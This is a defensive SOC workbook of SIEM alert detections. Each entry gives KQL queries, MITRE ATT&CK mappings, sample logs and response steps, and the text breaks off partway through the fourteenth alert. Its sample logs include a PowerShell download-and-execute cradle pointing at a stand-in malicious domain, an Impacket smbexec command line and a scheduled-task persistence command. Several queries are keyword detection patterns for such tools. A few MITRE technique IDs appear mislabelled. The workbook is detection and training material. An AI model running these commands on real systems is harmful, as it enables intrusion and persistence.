2025 SIEM ALERT

DETECTION
WORKBOOK WITH
50 REALISTIC AND
INCREASINGLY
COMMON SIEM
ALERTS

BY IZZMIER IZZUDDIN
This workbook contains a curated list of 50 realistic and increasingly common SIEM alerts,
each structured for SOC use with detection logic, MITRE ATT&CK mapping, log examples,
threat behavior indicators and response playbooks.

1. Suspicious OAuth application consent granted in Microsoft 365

2. Successful login after multiple failed RDP attempts from foreign IP
3. Data exfiltration detected via cloud storage services (example, OneDrive, Dropbox)
4. Office macro spawning PowerShell with encoded commands
5. Lateral movement via SMB, WMI or WinRM detected
6. Impossible travel login attempts from geographically separate regions
7. DNS tunneling communication patterns observed
8. PsExec or Impacket tool execution detected internally
9. Cloud IAM role assumption from non-approved user or IP
10. Creation of scheduled task by non-administrative account
11. Registry autorun key modification from unknown parent process
12. PowerShell download and execution from external URL
13. Suspicious beaconing to known malicious C2 domain
14. Excessive failed login attempts followed by a successful login
15. Local account creation on endpoint outside of provisioning process
16. Unusual volume of file encryption activity (potential ransomware)
17. Endpoint DLP alert on sensitive file movement to USB
18. VPN login from blacklisted IP addresses
19. Disabled antivirus or EDR agent service on endpoint
20. Mass file deletion detected on shared folder
21. New domain admin group member added
22. Login from newly registered domain email address
23. Brute-force attack detected on web-facing application login
24. Unusual login time detected based on user behaviour baseline
25. Uncommon protocol usage detected over standard ports (example, SSH over HTTP)
26. Remote PowerShell execution from unauthorised host
27. Mimikatz tool execution or similar credential dumping tool detected
28. New inbox rule created to auto-forward emails externally
29. Suspicious VPN login not followed by normal application access
30. Failed multi-factor authentication attempts exceeding threshold
31. Lateral movement using RDP from a non-jump host
32. Rare or first-time login from specific device or location
33. Changes to critical GPO objects in Active Directory
34. Discovery commands executed in quick succession on endpoint
35. Unusual spike in outbound network traffic volume
36. Unauthorised access attempt to restricted file shares
37. Endpoint connection to known malware distribution domain
38. Unusual PowerShell command involving Base64 decoding
39. Login with disabled or expired user account
40. Cloud workload performing port scanning on internal assets
41. Cloud bucket misconfiguration alert (example, open to public)
42. Fileless malware behaviour detected via memory-only execution
43. Excessive use of “net use” or “net group” command on hosts
44. Kerberoasting activity detected in AD logs
45. Access to critical application with bypassed SSO
46. Activity resembling Golden Ticket or Silver Ticket attacks
47. Device sending SMTP traffic directly to internet without relay
48. Unusual API key usage patterns in cloud service
49. Unauthorised modification of IAM policy in AWS or Azure
50. Legacy protocol (example, NTLMv1) authentication used internally
1. Alert Name: Suspicious OAuth Application Consent Granted (Microsoft 365)

Alert Logic

Objective: Detect when a user consents to a malicious or suspicious third-party

application that has high privileges (example, mail read/write, file access, etc.)

Data Source: Microsoft 365 Unified Audit Log, Azure AD sign-in logs and Azure AD audit
logs.

Detection Logic (KQL - Microsoft Sentinel example):

AuditLogs
| where OperationName == "Consent to application"
| extend AppId = tostring(parse_json(TargetResources)[0].id)
| extend AppName = tostring(parse_json(TargetResources)[0].displayName)
| extend Permissions =
tostring(parse_json(TargetResources)[0].modifiedProperties[?(@.displayName ==
"Resource ID")].newValue)
| extend ConsentType =
tostring(parse_json(TargetResources)[0].modifiedProperties[?(@.displayName ==
"Consent Type")].newValue)
| extend UserPrincipalName = tostring(parse_json(InitiatedBy.user).userPrincipalName)
| where ConsentType =~ "User" or ConsentType =~ "AllPrincipals"
| where Permissions has_any ("Mail.Read", "Mail.ReadWrite", "Files.Read.All",
"Sites.Read.All", "offline_access")
| project TimeGenerated, UserPrincipalName, AppId, AppName, Permissions,
ConsentType

Logic Summary:

• Triggers when a user or tenant admin grants access to a third-party app

• Filters on dangerous permissions
• Detects both individual and delegated (tenant-wide) consents

MITRE ATT&CK Mapping

Category Detail
Tactic Persistence, Credential Access, Collection
Techniques - T1556.006: Adversary-in-the-Middle (OAuth Abuse)
- T1078: Valid Accounts (via OAuth token abuse)
- T1087.002: Cloud Account Discovery
Explanation:
Attackers leverage OAuth tokens to establish persistence without triggering password
resets or MFA. The abuse of legitimate cloud features falls under credential access and
persistence tactics.

Log Example (Microsoft 365 Audit JSON format)

{
"CreationTime": "2025-04-23T08:17:24Z",
"Id": "abc12345-1111-2222-3333-xyz98765",
"Operation": "Consent to application",
"OrganisationId": "org-123456",
"UserId": "izzmier@company.com",
"UserType": 0,
"RecordType": 8,
"Workload": "AzureActiveDirectory",
"ClientIP": "203.123.45.67",
"UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
"TargetResources": [
{
"id": "a1b2c3d4-5678-90ef-ghij-112233445566",
"displayName": "MailAccessPro",
"modifiedProperties": [
{
"displayName": "Consent Type",
"newValue": "User"
},
{
"displayName": "Resource ID",
"newValue": "[\"Mail.ReadWrite\",\"offline_access\"]"
}
]
}
],
"InitiatedBy": {
"user": {
"id": "user-guid-0001",
"userPrincipalName": "izzmier@company.com",
"displayName": "Izzmier"
}
}
}

Recommended Response Actions

1. Revoke OAuth Consent from the user account via Azure AD portal.
2. Investigate Application ID to check if it's reported on threat intel databases
(example, VirusTotal, M365 Defender TI).
3. Run Sign-in Analysis for the user in question and check any abnormal activities.
4. Reset User Session Tokens and review conditional access policies.
5. Hunt for similar consents across other users using the same logic.
2. Alert Name: Successful RDP Login After Multiple Failed Attempts from Foreign IP

Alert Logic

Objective: Detect brute-force RDP attacks followed by successful authentication, often a

sign of credential compromise.

Data Sources:

• Windows Security Event Logs (Event IDs: 4625 for failed logon, 4624 for successful
logon)
• Firewall logs (to confirm public IP source)
• Threat Intelligence feeds (to flag foreign or risky IPs)

Detection Logic (KQL – Microsoft Sentinel example):

let time_window = 30m;

let brute_force_threshold = 10;
let FailedLogons = SecurityEvent
| where EventID == 4625 and LogonType == 10
| summarise FailedCount = count(), FailedTimes = make_list(TimeGenerated) by
TargetUserName, IPAddress, bin(TimeGenerated, 5m)
| where FailedCount >= brute_force_threshold;

let SuccessfulLogons = SecurityEvent

| where EventID == 4624 and LogonType == 10
| project SuccessTime = TimeGenerated, TargetUserName, IPAddress;

FailedLogons
| join kind=inner (SuccessfulLogons) on TargetUserName, IPAddress
| where SuccessTime between (FailedLogons.TimeGenerated and
FailedLogons.TimeGenerated + time_window)
| extend Alert = "Brute force suspected: Multiple RDP failures followed by successful login"

Logic Summary:

• RDP = LogonType 10
• Threshold of failed attempts (example, ≥10)
• Successful login within a short time (example, 30 minutes) from same IP
• Optional: Filter IPs outside organisation’s geolocation or allowlist

MITRE ATT&CK Mapping

Category Detail
 Tactic Initial Access, Credential Access
Techniques - T1110.001: Brute Force – Password Guessing (RDP)
- T1078.001: Valid Accounts – Local Accounts

Explanation:
The alert maps to adversaries using brute-force techniques to guess credentials and gain
access via RDP, particularly targeting internet-exposed machines

Log Events (Windows Event Log Format)

Event ID 4625 – Failed RDP Attempt

{
"EventID": 4625,
"TimeGenerated": "2025-04-23T08:01:00Z",
"TargetUserName": "adminuser",
"LogonType": 10,
"IpAddress": "193.203.45.12",
"Status": "0xC000006D",
"FailureReason": "Unknown user name or bad password",
"WorkstationName": "WIN-RDP01"
}

Event ID 4625 – Repeated

(Multiple similar entries in short interval from same IP)

Event ID 4624 – Successful RDP Login

{
"EventID": 4624,
"TimeGenerated": "2025-04-23T08:05:30Z",
"TargetUserName": "adminuser",
"LogonType": 10,
"IpAddress": "193.203.45.12",
"Status": "0x0",
"WorkstationName": "WIN-RDP01",
"AuthenticationPackage": "Negotiate"
}

Threat Intelligence Match (Optional Add-on)

{
"IpAddress": "193.203.45.12",
 "ThreatScore": 85,
"ThreatCategory": "Brute Force, RDP Abuse",
"Country": "Russia",
"Confidence": "High"
}

Recommended Response Actions

1. Isolate the machine immediately from the network if compromise suspected.

2. Force password reset for the account involved and check for lateral movement.
3. Check for tools or scripts dropped post-login (example, Mimikatz, malware).
4. Add IP to blocklist and update firewall rules if applicable.
5. Enable RDP geo-restriction or VPN access only with MFA.
6. Review audit logs to ensure no persistence was established.
3. Data Exfiltration via Cloud Storage Services (example, OneDrive, Dropbox)

Alert Logic

Objective: Detect large or unusual data uploads to cloud storage providers which may
indicate exfiltration.

Data Sources:

• Endpoint DLP
• CASB (Cloud Access Security Broker)
• Proxy/firewall logs

Detection Logic Example (KQL or CASB Policy):

DeviceNetworkEvents
| where RemoteUrl has_any ("dropbox.com", "drive.google.com", "onedrive.live.com")
| summarise UploadVolume = sum(SentBytes) by DeviceName, RemoteUrl,
InitiatingProcessAccountName, bin(TimeGenerated, 1h)
| where UploadVolume > 100000000 // example, >100MB

Logic Summary:

• Detects data uploads to known cloud services

• Threshold-based (example, >100MB in 1 hour)
• Can enrich with file sensitivity metadata from DLP

MITRE ATT&CK Mapping

Tactic Exfiltration
Technique T1567.002 – Exfiltration to Cloud Storage

Log

{
"TimeGenerated": "2025-04-23T10:32:12Z",
"DeviceName": "HR-PC01",
"InitiatingProcessAccountName": "nur.izzah@company.com",
"RemoteUrl": "https://www.dropbox.com/upload",
"SentBytes": 154387422,
"ProcessName": "chrome.exe"
}

Response Actions
• Confirm file type and sensitivity
• Interview user to validate purpose
• Block cloud storage access from unmanaged endpoints
• Review access policies in CASB
4. Office Macro Spawning PowerShell with Encoded Commands

Alert Logic

Objective: Detect initial access via Office macros that invoke PowerShell scripts.

Data Sources:

• EDR
• Sysmon (Event ID 1 – process creation)

Detection Logic (EDR/Sysmon Example):

DeviceProcessEvents
| where InitiatingProcessName endswith "winword.exe"
| where FileName == "powershell.exe"
| where ProcessCommandLine has "-enc" or contains "FromBase64String"

MITRE ATT&CK Mapping

Tactic Initial Access, Execution

Techniques T1203 (Exploitation for Client Execution), T1059.001 (PowerShell)

Log

{
"TimeGenerated": "2025-04-23T09:15:00Z",
"DeviceName": "FIN-PC23",
"InitiatingProcess": "C:\\Program Files\\Microsoft Office\\root\\Office16\\winword.exe",
"ProcessCommandLine": "powershell.exe -enc JAB...dA==",
"ProcessId": 4320,
"UserName": "amirul.azim@company.com"
}

Response Actions

• Quarantine device
• Obtain the full script from memory (if possible)
• Submit the decoded command to sandbox analysis
• Block future macro execution by GPO or Defender ASR rules
5. Lateral Movement via SMB, WMI or WinRM Detected

Alert Logic

Objective: Detect unauthorised use of lateral movement protocols between internal

systems.

Data Sources:

• EDR
• Sysmon (Event ID 3 – network connection)
• Zeek logs (if deployed)

Detection Logic (Sysmon + EDR):

DeviceNetworkEvents
| where RemotePort == 445 or RemotePort == 135 or RemotePort == 5985
| where InitiatingProcessName has_any ("wmic.exe", "powershell.exe", "psexec.exe")
| where AccountDomain !startswith "IT" and AccountName !in ("admin1", "svc-backup")

MITRE ATT&CK Mapping

Tactic Lateral Movement

Techniques T1021.002 – SMB/Windows Admin Shares, T1047 – WMI, T1028 – WinRM

Log

{
"TimeGenerated": "2025-04-23T11:03:45Z",
"DeviceName": "CORP-LAPTOP32",
"InitiatingProcess":
"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"RemoteAddress": "192.168.1.47",
"RemotePort": 5985,
"UserName": "adam.zulkifli@company.com"
}

Response Actions

• Correlate with recent login history of the user

• Capture memory for forensic review
• Disable compromised account if confirmed
• Enable PowerShell Constrained Language Mode and block WMI where unnecessary
6. Alert Name: Impossible Travel Login Attempts

Alert Logic

Objective: Detect account compromise based on geographically impossible login activity

within an unrealistically short time frame.

Data Sources:

• Identity Provider logs (example, Azure AD, Okta, Google Workspace)

• Geo-IP database (enrichment layer)
• UEBA (User and Entity Behaviour Analytics) systems

Detection Logic (KQL – Microsoft Sentinel / Azure AD Example):

let logins = SigninLogs

| where ResultType == 0
| project UserPrincipalName, Location, IPAddress, TimeGenerated, Country =
tostring(LocationDetails.countryOrRegion);

logins
| join kind=inner (
logins
| project UserPrincipalName, PreviousTime = TimeGenerated, PreviousCountry =
Country
) on UserPrincipalName
| where abs(datetime_diff('minute', TimeGenerated, PreviousTime)) < 60
| where Country != PreviousCountry
| extend Alert = "Impossible Travel Detected: Different countries within 60 minutes"

Logic Summary:

• Finds two logins from different countries within a short window (example, <60
minutes)
• Highlights unrealistic travel scenario (example, Malaysia to Germany in 20 minutes)
• Can be enhanced with known user travel policy and conditional access tags

MITRE ATT&CK Mapping

Z Credential Access, Initial Access

Techniques T1078 – Valid Accounts, T1556.001 – Input Capture: Credential Phishing
Explanation:
Often associated with account compromise due to phishing or password reuse across
exposed services.

Log Events (Azure Sign-In Logs)

Login 1 – Kuala Lumpur, Malaysia

{
"TimeGenerated": "2025-04-23T08:05:00Z",
"UserPrincipalName": "maria.lim@company.com",
"IPAddress": "175.139.21.45",
"Location": {
"city": "Kuala Lumpur",
"countryOrRegion": "MY"
},
"ResultType": 0,
"ClientAppUsed": "Browser",
"AuthenticationRequirement": "MFA"
}

Login 2 – Berlin, Germany (30 minutes later)

{
"TimeGenerated": "2025-04-23T08:35:00Z",
"UserPrincipalName": "maria.lim@company.com",
"IPAddress": "92.212.121.99",
"Location": {
"city": "Berlin",
"countryOrRegion": "DE"
},
"ResultType": 0,
"ClientAppUsed": "Browser",
"AuthenticationRequirement": "MFA Bypass"
}

Response Actions

1. Lock user account and force password reset

2. Check for conditional access policy gaps, such as missing MFA or MFA bypass for
trusted IPs
3. Review email rules and OAuth grants for malicious persistence
4. Analyze session token usage to understand if token replay or session hijack
occurred
5. Initiate full account activity review with focus on privilege escalation or data access
7. Alert Name: DNS Tunneling Communication Patterns Observed

Alert Logic

Objective: Detect covert data exfiltration or Command-and-Control (C2) using DNS

protocol often by abusing TXT or NULL record queries with encoded payloads.

Data Sources:

• DNS logs (example, Windows DNS Server, Zeek, Palo Alto, Infoblox, Cisco
Umbrella)
• Network traffic analysis
• Threat intelligence feeds

Detection Logic (Zeek DNS Log Example in KQL):

DNSLogs
| where QueryType in ("TXT", "NULL")
| extend SubdomainLength = strlen(split(QueryName, ".")[0])
| where SubdomainLength > 50
| summarise Count = count(), UniqueQueryNames = dcount(QueryName) by SrcIP,
bin(TimeGenerated, 15m)
| where Count > 100 or UniqueQueryNames > 80

Logic Summary:

• Looks for high-volume DNS requests with very long subdomains

• Flags uncommon record types (TXT, NULL) used in tunneling
• Ideal with DNS entropy scoring or threat intel enrichment

MITRE ATT&CK Mapping

Tactic Command and Control

Techniques T1071.004 – Application Layer Protocol: DNS

Explanation:
DNS tunneling enables attackers to communicate through firewalls using DNS queries as a
transport for payloads or commands.

DNS Log Entry (Zeek or Infoblox Style)

{
"TimeGenerated": "2025-04-23T09:42:00Z",
"SrcIP": "10.20.30.40",
 "QueryName": "9ab7dffed0310c7fefbcd10c3f9c9be01e3fa1.example.com",
"QueryType": "TXT",
"ResponseCode": "NOERROR",
"Answer": "dXNlcm5hbWU9am9obg==",
"Resolver": "8.8.8.8",
"ClientName": "client-PC01.company.local"
}

Threat Behavior Indicators

• Excessive queries from one internal host to non-cached subdomains

• Use of uncommon query types (example, TXT, NULL)
• Consistent beaconing to a suspicious domain
• Subdomain patterns with base64 or hex encoding

Response Actions

1. Block the destination domain/IP at the DNS resolver or firewall level

2. Quarantine the endpoint and review for malware artifacts
3. Decode and analyse subdomain content for indicators of exfiltrated data
4. Hunt for similar patterns across other internal endpoints
5. Apply DNS tunneling detection signatures in IDS/IPS and SIEM
6. Implement DNS query sise and volume thresholds for detection and alerting
8. Alert Name: PsExec or Impacket Tool Execution Detected Internally

Alert Logic

Objective: Detect lateral movement attempts using common post-exploitation tools such
as PsExec, Impacket’s wmiexec.py, smbexec.py or psexec.py.

Data Sources:

• EDR (CrowdStrike, Microsoft Defender for Endpoint, SentinelOne, etc.)

• Sysmon (Event ID 1 for process creation)
• Windows Security Event Logs (Event IDs 4688, 7045)

Detection Logic (KQL - Microsoft Sentinel or Defender EDR):

DeviceProcessEvents
| where FileName in~ ("psexec.exe", "smbexec.py", "wmiexec.py", "psexec.py")
or ProcessCommandLine has_any ("RemCom", "PAExec", "Impacket", "smbexec",
"Service Control Manager")
| where InitiatingProcessAccountName !contains "admin" and !contains "svc"
| extend Alert = "Lateral movement tool detected: PsExec/Impacket"

Alternate Logic (Sysmon - Process Creation):

Sysmon
| where EventID == 1
| where ParentImage has_any ("python.exe", "cmd.exe")
| where CommandLine has_any ("smbexec", "wmiexec", "psexec")

MITRE ATT&CK Mapping

Tactic Lateral Movement

Techniques T1021.002 – SMB/Windows Admin Shares, T1021.003 – Distributed
Component Object Model (DCOM)

Explanation:
These tools are used by red teams, ransomware groups and APT actors to move laterally
using valid credentials and common protocols (SMB, RPC, WMI).

EDR Log (Process Execution)

{
"TimeGenerated": "2025-04-23T10:55:01Z",
"DeviceName": "FINANCE-WS33",
 "InitiatingProcessAccountName": "norazila.kassim@company.com",
"FileName": "python.exe",
"ProcessCommandLine": "python smbexec.py
COMPANY/domainuser:Password123@192.168.10.21",
"ParentProcessName": "cmd.exe",
"MD5": "e99a18c428cb38d5f260853678922e03",
"SHA256": "c3b414e5e8b8a7c8cf6d07f9a6e4a00c..."
}

Other Identifiers

• PsExec creates a service called PSEXESVC on the remote system

• Impacket tools often create processes like cmd.exe /Q /c remotely via SMB
• Process lineage from python.exe or cmd.exe with suspicious parameters

Response Actions

1. Immediately isolate the affected host

2. Review lateral access targets and check for any persistence setup
3. Search for usage of PsExec service creation on other systems
4. Reset passwords for any involved accounts (especially shared/domain accounts)
5. Apply blocking and alerting for known Impacket hash signatures and behaviour
6. Enable Windows Firewall rules to block SMB from workstation to workstation
9. Alert Name: Cloud IAM Role Assumption from Non-Approved User or IP

Alert Logic

Objective: Detect unauthorised or suspicious usage of high-privilege cloud roles from

unexpected users or source IP addresses.

Data Sources:

• AWS CloudTrail
• Azure Activity Logs
• GCP Admin Activity Audit Logs
• Identity provider logs (example, Azure AD sign-ins, Okta, etc.)

Detection Logic (AWS CloudTrail – Example in KQL-like format):

CloudTrail
| where EventName == "AssumeRole"
| extend RoleName = parse_json(RequestParameters).roleArn
| where RoleName has_any ("Admin", "PowerUser", "SecurityAudit")
| where SourceIPAddress !in ("known-branch-IP-1", "vpn-gateway-ip", "trusted-user-ip-
list")
| summarise Count = count() by UserIdentityArn, RoleName, SourceIPAddress,
bin(EventTime, 1h)

Logic Summary:

• Flags when high-privilege roles (example, Admin, SecurityAudit) are assumed

• Filters out trusted IPs and expected users
• Ideal when paired with a list of approved users/IP ranges

MITRE ATT&CK Mapping

Tactic Privilege Escalation, Defense Evasion

Techniques T1078.004 – Cloud Accounts, T1098.001 – Account Manipulation:
Additional Cloud Roles

Explanation:
Attackers with initial access to a cloud account (example, via token theft, OAuth abuse or
credentials) escalate privileges by assuming higher roles in the environment.

Log (AWS CloudTrail Entry)

{
 "eventTime": "2025-04-23T11:20:00Z",
"eventName": "AssumeRole",
"userIdentity": {
"type": "IAMUser",
"userName": "lina.firdaus",
"arn": "arn:aws:iam::112233445566:user/lina.firdaus"
},
"sourceIPAddress": "103.122.45.78",
"requestParameters": {
"roleArn": "arn:aws:iam::112233445566:role/AdminAccess"
},
"awsRegion": "us-east-1",
"eventSource": "sts.amazonaws.com"
}

Threat Behavior Indicators

• Use of AssumeRole API with no prior history for the user

• Role assumed from new IP or region (example, assuming SecurityAudit from outside
MY)
• Time-of-day anomalies (example, 3:00 AM login from VPN exit node)
• Multiple AssumeRole attempts across different accounts or services

Response Actions

1. Revoke session/token immediately using AWS/Azure CLI

2. Review all actions performed under the assumed role
3. Restrict role assumption permissions via tighter IAM policy
4. Add conditional logic to IAM policies (IP restriction, device posture)
5. Enable alerts for all privilege-related CloudTrail/Activity Log actions
6. Force MFA re-registration if session hijack is suspected
10. Alert Name: Creation of Scheduled Task by Non-Administrative Account

Alert Logic

Objective: Detect potential persistence mechanisms where a non-admin user creates a

scheduled task a known technique used by malware and threat actors for re-execution.

Data Sources:

• Windows Security Event Logs (Event ID 4698 – scheduled task creation)

• Sysmon (Event ID 1 – process creation for schtasks.exe)
• EDR telemetry

Detection Logic (KQL – Sysmon or Security Event):

SecurityEvent
| where EventID == 4698
| where SubjectUserName !contains "admin" and SubjectUserName !startswith "svc"
| extend TaskName = tostring(parse_json(EventData).TaskName)
| project TimeGenerated, Computer, SubjectUserName, TaskName, Command

Alternate Logic (Sysmon – Process Creation):

Sysmon
| where EventID == 1
| where ProcessName == "schtasks.exe"
| where CommandLine has "/create"
| where InitiatingProcessAccountName !contains "admin" and !startswith "svc"

Logic Summary:

• Flags when schtasks.exe is used to create a task

• Filters out known admin and service accounts
• Can enrich with command line to identify suspicious script paths or payloads

MITRE ATT&CK Mapping

Tactic Persistence, Execution

Techniques T1053.005 – Scheduled Task

Explanation:
Scheduled tasks are a common persistence method, often abused by malware, droppers
or post-exploitation frameworks to ensure code runs on reboot or at specific times.
Log (Event ID 4698 – Windows Security Log)

{
"EventID": 4698,
"TimeGenerated": "2025-04-23T12:05:32Z",
"SubjectUserName": "nabila.rosli",
"TaskName": "\\Microsoft\\Windows\\UpdateMonitor",
"TaskContent": "schtasks.exe /create /tn \"\\Microsoft\\Windows\\UpdateMonitor\" /tr
\"C:\\Users\\nabila\\AppData\\Local\\Temp\\payload.bat\" /sc onlogon /rl highest"
}

Threat Behavior Indicators

• Task pointing to temp folder or AppData location

• schtasks creation from a non-administrative user or via script
• Scheduled task created to run at logon or system startup
• Task content includes base64 PowerShell or obfuscated payloads

Response Actions

1. Extract and analyse task payload file (example, .bat, .ps1)

2. Delete the malicious scheduled task using schtasks /delete
3. Review timeline for other persistence or privilege escalation attempts
4. Investigate whether initial access was achieved via phishing or vulnerability
5. Quarantine host and conduct malware scan or memory forensics
6. Implement AppLocker or WDAC to restrict execution from user-writable paths
11. Alert Name: Registry Autorun Key Modification from Unknown or Suspicious
Parent Process

Alert Logic

Objective: Detect persistence mechanisms where malware or threat actors modify

Windows autorun registry keys often without user awareness.

Data Sources:

• Sysmon (Event ID 13 – Registry value set)

• EDR platforms
• Windows Security logs (if registry auditing is enabled)

Detection Logic (KQL – Sysmon Registry Event Example):

Sysmon
| where EventID == 13
| where TargetObject has_any (
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run",
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce",
"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce"
)
| where Image !endswith "explorer.exe" and Image !endswith "services.exe"
| extend RegistryKey = TargetObject, WrittenValue = Details
| project TimeGenerated, Computer, UserName, Image, RegistryKey, WrittenValue

Logic Summary:

• Flags write operations to known autorun keys

• Filters out benign parent processes (example, explorer.exe, services.exe)
• Captures binary paths or scripts written to registry

MITRE ATT&CK Mapping

Tactic Persistence
Technique T1547.001 – Registry Run Keys/Startup Folder

Explanation:
Adversaries modify autorun keys to re-execute malware every time a user logs in or system
reboots.

Sysmon Log (Event ID 13 – Registry Value Set)

{
"EventID": 13,
"TimeGenerated": "2025-04-23T12:45:20Z",
"UserName": "shahrul.nizam@company.com",
"Image": "C:\\Users\\shahrul\\AppData\\Local\\Temp\\suspicious.exe",
"TargetObject":
"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\WindowsUpdateHelper",
"Details": "C:\\Users\\shahrul\\AppData\\Roaming\\WinUpdate\\updater.exe"
}

Threat Behavior Indicators

• Autorun registry keys pointing to user-writable folders (AppData, Temp, Roaming)

• Executables launched from unexpected locations or created by abnormal parent
processes
• Registry value includes obfuscated script runners (example, PowerShell, Wscript)

Response Actions

1. Delete the malicious autorun registry key using Regedit or reg delete
2. Extract and analyse the referenced file path for malware
3. Check parent process lineage and initial dropper activity
4. Enable registry auditing for high-value keys if not already enabled
5. Use GPO or endpoint protection to block autorun key modifications by users
6. Search for similar registry key patterns across other endpoints
12. Alert Name: PowerShell Download and Execution from External URL

Alert Logic

Objective: Detect execution of PowerShell commands that download remote content

typically used in fileless malware, droppers and initial access stages.

Data Sources:

• Sysmon (Event ID 1 – Process Creation)

• EDR (Microsoft Defender, CrowdStrike, SentinelOne)
• Windows PowerShell logs (Event ID 4104 – ScriptBlockLogging)

Detection Logic (KQL – Sysmon + EDR Process Creation):

DeviceProcessEvents
| where FileName == "powershell.exe"
| where ProcessCommandLine has_any ("Invoke-WebRequest", "Invoke-Expression", "IEX",
"DownloadString", "curl", "wget")
| where ProcessCommandLine has_any ("http", "https")
| extend Alert = "PowerShell downloading code from external URL"

Alternate Detection (PowerShell ScriptBlock Logging):

SecurityEvent
| where EventID == 4104
| where ScriptBlockText has_any ("DownloadString", "Invoke-Expression", "IEX", "http",
"https")

MITRE ATT&CK Mapping

Tactic Execution, Initial Access

Techniques T1059.001 – Command and Scripting Interpreter: PowerShell
T1203 – Exploitation for Client Execution

Explanation:
Threat actors often use PowerShell to download payloads directly into memory using
Invoke-WebRequest, IEX or DownloadString to avoid writing files to disk.

Sysmon Log (Event ID 1 – PowerShell Process Creation)

{
"EventID": 1,
"TimeGenerated": "2025-04-23T13:10:55Z",
 "UserName": "syafiq.rahman@company.com",
"Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
"CommandLine": "powershell.exe -nop -w hidden -c IEX (New-Object
Net.WebClient).DownloadString('http://maliciousdomain.com/payload.ps1')",
"ParentImage": "C:\\Users\\syafiq\\AppData\\Local\\Temp\\doc1.docx"
}

Threat Behavior Indicators

• PowerShell execution with -nop -w hidden or obfuscated command line

• Use of DownloadString, Invoke-WebRequest, curl or wget in PowerShell
• Script sourced from a suspicious or newly registered domain
• Execution with no corresponding disk file artifacts (memory-only)

Response Actions

1. Immediately isolate the host to prevent lateral movement or C2

2. Block the source URL/IP at proxy, DNS and perimeter firewall
3. Extract and sandbox the remote script for malware analysis
4. Enable Constrained Language Mode or Defender ASR to block script abuse
5. Hunt for similar PowerShell command patterns across other endpoints
6. Enable PowerShell logging (module, script block, transcription) in enterprise GPO
13. Alert Name: Suspicious Beaconing to Known Malicious Command and Control (C2)
Domain

Alert Logic

Objective: Detect beaconing activity to known C2 infrastructure which often involves

regular, repeated connections to a remote domain or IP with low data volume.

Data Sources:

• Firewall logs (example, Palo Alto, Fortinet, Cisco ASA)

• DNS logs (example, Zeek, Infoblox)
• Proxy logs
• Threat Intelligence feeds (VirusTotal, BrightCloud, AlienVault OTX)

Detection Logic (KQL – Proxy or DNS Traffic + Threat Intel):

CommonSecurityLog
| where DestinationDomain in (external_threat_intel_domains)
| summarise ConnectionCount = count(), AvgBytesOut = avg(SentBytes), FirstSeen =
min(TimeGenerated), LastSeen = max(TimeGenerated) by SourceIP, DestinationDomain
| where ConnectionCount > 20 and AvgBytesOut < 5000

Logic Summary:

• Frequent connections to known C2 domains

• Beacon-like behaviour: regular intervals, small payload sises
• Uses threat intel to match against known C2 IOCs

MITRE ATT&CK Mapping

Tactic Command and Control

Technique T1071 – Application Layer Protocol
Sub- T1071.001 (Web Traffic), T1071.002 (DNS), T1071.003 (Mail), T1071.004
techniques (Custom Protocols)

Explanation:
C2 beaconing is used by malware to check in with the attacker, await instructions or
exfiltrate small packets of data.

Firewall Log Entry

{
"TimeGenerated": "2025-04-23T13:35:11Z",
 "SourceIP": "10.100.23.50",
"DestinationIP": "94.142.241.111",
"DestinationDomain": "panel.backconnect-server[.]com",
"DestinationPort": 80,
"SentBytes": 379,
"ReceivedBytes": 921,
"DeviceName": "HQ-FW01",
"Action": "Allowed",
"Category": "C2/Beaconing",
"ThreatIntelHit": "Yes"
}

Threat Behavior Indicators

• Small-sised outbound connections on fixed intervals (example, every 60s)

• Rare or first-seen domains
• Connections to domains with poor or newly registered reputations
• No corresponding inbound responses or high-entropy domain names

Response Actions

1. Block the domain/IP at DNS, proxy and firewall levels

2. Investigate the internal source IP for signs of malware (EDR scan, memory analysis)
3. Correlate with process ID or hash if endpoint telemetry is available
4. Review historical traffic to determine dwell time and scope
5. Use sandbox or TI to classify the C2 infrastructure (example, malware family)
6. Add detection for similar patterns (example, periodic traffic to uncommon TLDs)
14. Alert Name: Excessive Failed Login Attempts Followed by a Successful Login

Alert Logic

Objective: Detect brute-force or password-spraying behaviour where an attacker attempts

multiple failed logins and eventually succeeds.

Data Sources:

• Windows Security Logs (Event IDs: 4625 for failed, 4624 for successful logins)
• Identity provider logs (example, Azure AD, Okta, G Suite)
• VPN or authentication gateway logs

Detection Logic (KQL – SecurityEvent + Time Correlation):

let FailedLogins = SecurityEvent

| where EventID == 4625
| summarise FailedCount = count(), FailedIPs = make_list(IpAddress), FirstFail =
min(TimeGenerated), LastFail = max(TimeGenerated) by TargetUserName
| where FailedCount >= 10;

let SuccessfulLogins = SecurityEvent

| where EventID == 4624
| project TargetUserName, SuccessTime = TimeGenerated, SuccessIP = IpAddress;

FailedLogins
| join kind=inner (SuccessfulLogins) on TargetUserName
| where SuccessTime between (FirstFail and LastFail + 30m)
| extend Alert = "Multiple failed login attempts followed by successful login"

Logic Summary:

• Detects ≥10 failed login attempts for a user

• Followed by a successful login from same or related IP within a short time window
(example, 30 minutes)
• Useful for identifying brute-force, credential stuffing or password reuse

MITRE ATT&CK Mapping

Tactic Credential Access

Techniques T1110.001 – Brute Force: Password Guessing
T1078 – Valid Accounts
Explanation:
A common attack method where stolen or weak passwords are tried in bulk until a
successful authentication is achieved.

Windows Security Log Snippets

Event ID 4625 – Failed Logon

{
"EventID": 4625,
"TimeGenerated": "2025-04-23T13:50:05Z",
"TargetUserName": "hafizul.azmi",
"LogonType": 2,
"IpAddress": "198.51.100.55",
"Status": "0xC000006A",
"FailureReason": "Unknown user name or bad password"
}

(Repeated 15 times over ~10 minutes)

Event ID 4624 – Successful Logon

{
"EventID": 4624,
"TimeGenerated": "2025-04-23T14:03:12Z",
"TargetUserName": "hafizul.azmi",
"LogonType": 2,
"IpAddress": "198.51.100.55",
"Status": "0x0"
}

Threat Behavior Indicators

• Clustered failed attempts followed by a successful login from same or nearby IP

• Common usernames targeted across multiple systems (indicates spraying)
• Follow-up activity like privilege escalation, credential dumping or persistence setup

Response Actions

